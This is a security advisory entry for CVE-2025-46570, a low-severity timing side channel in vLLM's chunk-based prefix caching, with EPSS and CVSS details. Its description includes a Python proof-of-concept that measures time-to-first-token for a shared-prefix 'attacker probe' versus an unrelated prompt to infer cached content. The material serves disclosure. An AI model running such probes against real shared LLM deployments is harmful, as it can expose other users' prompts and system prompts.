CVE-2025-46570

Published: May 29, 2025
Source: debian
EPSS: Low

Description

vLLM is an inference and serving engine for large language models (LLMs). Prior to version 0.9.0, when a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). These timing differences caused by matching chunks are significant enough to be recognized and exploited. This issue has been patched in version 0.9.0.
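To make the timing difference concrete, below is a minimal sketch (not from the advisory) of how an observer could compare TTFT for a probe prompt that shares a prefix with a previously processed prompt against an unrelated probe. It assumes a vLLM server exposing the OpenAI-compatible /v1/completions streaming endpoint at localhost:8000 and a placeholder model name "my-model"; a consistently lower TTFT for the shared-prefix probe suggests the prefix chunks were already cached.

import time
import requests

def measure_ttft(prompt, url="http://localhost:8000/v1/completions"):
    # Time from request start until the first streamed chunk arrives (TTFT).
    payload = {
        "model": "my-model",   # hypothetical model name, adjust to the deployment
        "prompt": prompt,
        "max_tokens": 1,
        "stream": True,
    }
    start = time.monotonic()
    with requests.post(url, json=payload, stream=True, timeout=30) as resp:
        resp.raise_for_status()
        for line in resp.iter_lines():
            if line:  # first non-empty SSE line marks the first token
                return time.monotonic() - start
    return float("inf")

# Prime the cache with a "victim" prompt, then probe once with a prompt
# sharing its prefix and once with an unrelated prompt; compare the TTFTs.
victim_prefix = "Example system prompt that may already be cached. " * 20
measure_ttft(victim_prefix + "victim request")
warm = measure_ttft(victim_prefix + "attacker probe")
cold = measure_ttft("Unrelated text with no shared prefix. " * 20 + "attacker probe")
print(f"warm TTFT: {warm:.4f}s  cold TTFT: {cold:.4f}s")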

Packages

Package | Status | Fix version | Release | Type
vllm    | itp    | -           | -       | package

EPSS

Percentile: 9%
Score: 0.00036
Low

Related vulnerabilities

CVSS3: 2.6
redhat
3 months ago

CVSS3: 2.6
nvd
3 months ago

CVSS3: 2.6
github
3 months ago

Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching
